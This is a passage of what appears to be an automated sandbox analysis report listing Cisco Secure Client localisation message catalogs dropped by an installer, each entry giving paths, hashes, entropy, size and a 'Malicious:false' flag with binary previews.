                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\nl-nl\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347088
                                                                                                                                      Entropy (8bit):5.137429334753401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                      MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                      SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                      SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                      SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\nl-nl\LC_MESSAGES\is-RVLAV.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347088
                                                                                                                                      Entropy (8bit):5.137429334753401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                      MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                      SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                      SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                      SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\pl-pl\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):352370
                                                                                                                                      Entropy (8bit):5.387002164805478
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                      MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                      SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                      SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                      SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\pl-pl\LC_MESSAGES\is-9LT2B.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):352370
                                                                                                                                      Entropy (8bit):5.387002164805478
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                      MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                      SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                      SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                      SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\pt-br\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347902
                                                                                                                                      Entropy (8bit):5.1986177425205575
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                      MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                      SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                      SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                      SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\pt-br\LC_MESSAGES\is-RV1DC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347902
                                                                                                                                      Entropy (8bit):5.1986177425205575
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                      MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                      SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                      SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                      SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\ru-ru\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):467531
                                                                                                                                      Entropy (8bit):5.410391422981112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                      MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                      SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                      SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                      SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\ru-ru\LC_MESSAGES\is-KCJJQ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):467531
                                                                                                                                      Entropy (8bit):5.410391422981112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                      MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                      SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                      SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                      SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\zh-cn\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312691
                                                                                                                                      Entropy (8bit):6.238069670792444
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                      SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                      SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                      SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\zh-cn\LC_MESSAGES\is-V7509.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312691
                                                                                                                                      Entropy (8bit):6.238069670792444
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                      SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                      SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                      SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\zh-hans\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312693
                                                                                                                                      Entropy (8bit):6.237794032422467
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                      SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                      SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                      SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\zh-hans\LC_MESSAGES\is-FHJRQ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312693
                                                                                                                                      Entropy (8bit):6.237794032422467
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                      SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                      SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                      SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\zh-hant\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313019
                                                                                                                                      Entropy (8bit):6.234654802477353
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                      MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                      SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                      SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                      SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\zh-hant\LC_MESSAGES\is-D7TNP.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313019
                                                                                                                                      Entropy (8bit):6.234654802477353
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                      MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                      SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                      SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                      SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\zh-tw\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313017
                                                                                                                                      Entropy (8bit):6.23496399047262
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                      MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                      SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                      SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                      SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\zh-tw\LC_MESSAGES\is-JRKUQ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313017
                                                                                                                                      Entropy (8bit):6.23496399047262
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                      MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                      SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                      SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                      SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                      Malicious:false
